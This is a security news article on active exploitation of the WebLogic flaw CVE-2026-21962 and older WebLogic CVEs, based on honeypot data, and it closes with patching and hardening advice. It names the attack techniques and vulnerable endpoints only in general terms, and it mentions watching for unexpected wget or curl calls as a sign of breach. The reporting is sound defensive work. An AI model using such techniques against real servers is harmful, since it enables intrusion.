Active Attacks Target Critical WebLogic Remote Code Execution Flaws

A maximum-severity vulnerability in Oracle WebLogic Server is now being actively exploited in the wild, with threat actors beginning their attacks on the very same day public exploit code was released on GitHub.

Zero-Day Window Slams Shut Instantly

The flaw, tracked as CVE-2026-21962, carries a perfect CVSS score of 10.0, the highest possible rating for a vulnerability.

It allows unauthenticated attackers to remotely execute arbitrary operating system commands on vulnerable WebLogic servers without needing any credentials.

Exploitation began on January 22, 2026, the exact day the proof-of-concept code went public, leaving organizations with virtually no reaction time.

Researchers from CloudSEK deployed a high-interaction honeypot simulating a vulnerable Oracle WebLogic Server and monitored attacker behavior over a 12-day observation period.

The data captured an immediate and aggressive surge in automated scanning and exploitation attempts targeting the flaw.

Attackers exploit CVE-2026-21962 by sending specially crafted HTTP GET requests that use path traversal techniques to reach proxy endpoints.

This trick bypasses the server’s authentication layer entirely, allowing adversaries to run any command on the underlying operating system, effectively taking full control of the affected server.

The attack infrastructure was primarily built on rented Virtual Private Servers, with hosting providers like HOSTGLOBAL.PLUS and DigitalOcean are frequently abused to mask the true origin of attacks and scale operations.

Automated tools such as the botnet scanner libredtail-http and the Nmap Scripting Engine generated the highest volume of malicious requests.

Older Vulnerabilities Still Under Fire

The honeypot also detected persistent exploitation of several older, equally critical WebLogic vulnerabilities that threat actors have refused to abandon:

• CVE-2020-14882 / CVE-2020-14883 (CVSS 9.8): Allows attackers to bypass login screens and seize full server control via malicious HTTP POST requests to the admin console.
• CVE-2020-2551 (CVSS 9.8): A deserialization flaw in the IIOP protocol enables remote code execution by sending a crafted Java object to a JNDI console endpoint.
• CVE-2017-10271 (CVSS 9.8): Allows malicious code execution by sending a specially crafted XML payload to the WLS-WSAT component.

Researchers also noted a broad “spray and pray” strategy, with attackers probing honeypot servers for non-Oracle flaws, including well-known Hikvision and PHPUnit vulnerabilities, demonstrating how quickly threat actors adapt generic web reconnaissance tools to find any available entry point.

Security teams must act without delay to reduce exposure:

• Apply patches immediately: Install Oracle’s Critical Patch Update for January 2026, which addresses CVE-2026-21962 across all affected WebLogic and proxy components.
• Restrict console access: The WebLogic administrative console must never be exposed to the public internet. Enforce access only through strict firewall rules, VPNs, or isolated internal networks.
• Limit protocol exposure: Block or restrict network access to sensitive protocols like IIOP/T3 and WLS-WSAT from untrusted network segments.
• Deploy a Web Application Firewall (WAF): Configure WAF rules to detect and block path traversal sequences and known exploit signatures targeting the ProxyServlet.
• Enhance log monitoring: Actively monitor for unusual system command executions, such as unexpected wget or curl calls, which can indicate a successful breach in its early stages.

The pattern of immediate exploitation following public disclosure reinforces a critical security truth: for maximum-severity vulnerabilities, patch windows are measured in hours, not weeks.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google

The post Active Attacks Target Critical WebLogic Remote Code Execution Flaws appeared first on Cyber Security News.